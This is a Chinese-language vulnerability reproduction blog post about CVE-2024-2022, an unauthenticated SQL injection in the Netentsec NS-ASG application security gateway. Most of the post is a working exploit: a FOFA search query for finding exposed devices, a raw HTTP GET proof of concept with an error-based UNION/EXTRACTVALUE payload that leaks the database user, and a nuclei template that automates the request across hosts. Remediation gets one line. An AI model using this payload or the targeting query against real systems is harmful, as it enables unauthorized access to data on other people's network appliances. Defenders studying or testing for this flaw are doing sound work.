【漏洞复现】网康科技NS-ASG 应用安全网关存在SQL注入漏洞(CVE-2024-2022)

我是大白   ·   发表于 2024-03-07 20:46:28   ·   漏洞文章

漏洞描述

网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

产品界面

fofa语法

app="网康科技-NS-ASG安全网关"

poc

  1. GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0

nuclei验证

  1. id: CVE-2024-2022
  2. info:
  3. name: 网康科技NS-ASG 应用安全网关/admin/list_ipAddressPolicy.php接口存在SQL注入漏洞(CVE-2024-2022)
  4. author: nobody
  5. severity: critical
  6. description: |
  7. 网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
  8. impact: |
  9. 攻击者通过该漏洞可获取服务器敏感数据。
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: app="网康科技-NS-ASG安全网关"
  16. tags: cve,cve024,NS-ASG
  17. requests:
  18. - raw:
  19. - |
  20. GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
  21. Host: {{Hostname}}
  22. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
  23. matchers-condition: and
  24. matchers:
  25. - type: word
  26. part: body
  27. words:
  28. - "localhost"
  29. - type: status
  30. status:
  31. - 200

修复建议

升级到最新版本

打赏我,让我更有动力~

0 条回复   |  直到 1个月前 | 169 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.